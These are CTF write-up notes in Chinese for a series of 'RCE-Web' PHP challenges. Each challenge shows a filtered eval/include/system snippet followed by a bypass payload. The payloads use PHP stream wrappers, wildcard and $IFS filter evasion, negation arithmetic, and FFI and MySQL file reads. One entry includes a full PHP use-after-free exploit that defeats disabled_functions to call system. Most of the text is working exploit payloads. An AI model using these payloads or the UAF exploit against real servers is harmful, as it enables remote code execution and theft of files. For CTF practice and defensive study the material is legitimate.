RCE

RCE-Web32

 <?php

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
也可以使用包含日志

RCE-Web37

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
 
}else{
    highlight_file(__FILE__);
} 

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

RCE-Web39

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
} 

data://text/plain,<?php%20system("cat%20f*");?>//

RCE-Web40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
} 

无参数rce
show_source(next(array_reverse(scandir(current(localeconv())))));

RCE-Web50

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

tac%3C'fla''g.php'||ls

RCE-Web53

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

c\at${IFS}fla\g.php

RCE-Web54

<?php

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

mv${IFS}fla?.php${IFS}a.txt->c=uniq${IFS}a.txt

RCE-Web55

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

由于过滤了字母，但没有过滤数字，我们尝试使用/bin目录下的可执行程序。

但因为字母不能传入，我们需要使用通配符?来进行代替

?c=/bin/base64 flag.php
替换后变成
?c=/???/????64 ????.???

RCE-Web56

https://blog.csdn.net/qq_46091464/article/details/108513145

RCE-Web57

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// 还能炫的动吗？
<?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

只需要传入36即可
通过linux下的取反

可以看到得到36首先要得到-37

拿到-1

获得-37
再次取反

拿到36
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

RCE-Web72

<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

很多函数都被禁用了
glob协议扫目录
uac读文件

c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);

function ctfshow($cmd) {     global $abc, $helper, $backtrace;      class vuln {         public $a;         public function __destruct() {              global $backtrace;              unset($this->a);             $backtrace = (new exception)->gettrace();             if(!isset($backtrace[1]['args'])) {                 $backtrace = debug_backtrace();             }         }     }      class helper {         public $a, $b, $c, $d;     }      function str2ptr(&$str, $p = 0, $s = 8) {         $address = 0;         for($j = $s-1; $j >= 0; $j--) {             $address <<= 8;             $address |= ord($str[$p+$j]);         }         return $address;     }      function ptr2str($ptr, $m = 8) {         $out = "";         for ($i=0; $i < $m; $i++) {             $out .= sprintf("%c",($ptr & 0xff));             $ptr >>= 8;         }         return $out;     }      function write(&$str, $p, $v, $n = 8) {         $i = 0;         for($i = 0; $i < $n; $i++) {             $str[$p + $i] = sprintf("%c",($v & 0xff));             $v >>= 8;         }     }      function leak($addr, $p = 0, $s = 8) {         global $abc, $helper;         write($abc, 0x68, $addr + $p - 0x10);         $leak = strlen($helper->a);         if($s != 8) { $leak %= 2 << ($s * 8) - 1; }         return $leak;     }      function parse_elf($base) {         $e_type = leak($base, 0x10, 2);          $e_phoff = leak($base, 0x20);         $e_phentsize = leak($base, 0x36, 2);         $e_phnum = leak($base, 0x38, 2);          for($i = 0; $i < $e_phnum; $i++) {             $header = $base + $e_phoff + $i * $e_phentsize;             $p_type  = leak($header, 0, 4);             $p_flags = leak($header, 4, 4);             $p_vaddr = leak($header, 0x10);             $p_memsz = leak($header, 0x28);              if($p_type == 1 && $p_flags == 6) {                   $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;                 $data_size = $p_memsz;             } else if($p_type == 1 && $p_flags == 5) {                  $text_size = $p_memsz;             }         }          if(!$data_addr || !$text_size || !$data_size)             return false;          return [$data_addr, $text_size, $data_size];     }      function get_basic_funcs($base, $elf) {         list($data_addr, $text_size, $data_size) = $elf;         for($i = 0; $i < $data_size / 8; $i++) {             $leak = leak($data_addr, $i * 8);             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                 $deref = leak($leak);                                  if($deref != 0x746e6174736e6f63)                     continue;             } else continue;              $leak = leak($data_addr, ($i + 4) * 8);             if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                 $deref = leak($leak);                                  if($deref != 0x786568326e6962)                     continue;             } else continue;              return $data_addr + $i * 8;         }     }      function get_binary_base($binary_leak) {         $base = 0;         $start = $binary_leak & 0xfffffffffffff000;         for($i = 0; $i < 0x1000; $i++) {             $addr = $start - 0x1000 * $i;             $leak = leak($addr, 0, 7);             if($leak == 0x10102464c457f) {                 return $addr;             }         }     }      function get_system($basic_funcs) {         $addr = $basic_funcs;         do {             $f_entry = leak($addr);             $f_name = leak($f_entry, 0, 6);              if($f_name == 0x6d6574737973) {                 return leak($addr + 8);             }             $addr += 0x20;         } while($f_entry != 0);         return false;     }      function trigger_uaf($arg) {          $arg = str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa');         $vuln = new vuln();         $vuln->a = $arg;     }      if(stristr(php_os, 'win')) {         die('this poc is for *nix systems only.');     }      $n_alloc = 10;      $contiguous = [];     for($i = 0; $i < $n_alloc; $i++)         $contiguous[] = str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa');      trigger_uaf('x');     $abc = $backtrace[1]['args'][0];      $helper = new helper;     $helper->b = function ($x) { };      if(strlen($abc) == 79 || strlen($abc) == 0) {         die("uaf failed");     }      $closure_handlers = str2ptr($abc, 0);     $php_heap = str2ptr($abc, 0x58);     $abc_addr = $php_heap - 0xc8;      write($abc, 0x60, 2);     write($abc, 0x70, 6);      write($abc, 0x10, $abc_addr + 0x60);     write($abc, 0x18, 0xa);      $closure_obj = str2ptr($abc, 0x20);      $binary_leak = leak($closure_handlers, 8);     if(!($base = get_binary_base($binary_leak))) {         die("couldn't determine binary base address");     }      if(!($elf = parse_elf($base))) {         die("couldn't parse elf header");     }      if(!($basic_funcs = get_basic_funcs($base, $elf))) {         die("couldn't get basic_functions address");     }      if(!($zif_system = get_system($basic_funcs))) {         die("couldn't get zif_system address");     }       $fake_obj_offset = 0xd0;     for($i = 0; $i < 0x110; $i += 8) {         write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));     }      write($abc, 0x20, $abc_addr + $fake_obj_offset);     write($abc, 0xd0 + 0x38, 1, 4);      write($abc, 0xd0 + 0x68, $zif_system);       ($helper->b)($cmd);     exit(); }  ctfshow("cat /flag0.txt");ob_end_flush(); ?>

url编码提交

RCE-Web75

glob协议扫目录
利用Mysql读文件

try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

RCE-Web77

PHP7.4以上

$ffi=FFI::cdef("int system(const char *command);");$a='/readflag >1.txt';$ffi->system($a);

RCE-Web118

利用系统环境变量RCE
三种payload

${PATH:${#HOME}:${#SHLVL}}${PATH:${#RANDOM}:${#SHLVL}} ?${PATH:${#RANDOM}:${#SHLVL}}??.???
${PATH:~A}${PATH:${#TERM}:${SHLVL:~A}} ????.???
${PATH:~A}${PWD:~A}${IFS}????????
${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.??? #利用rev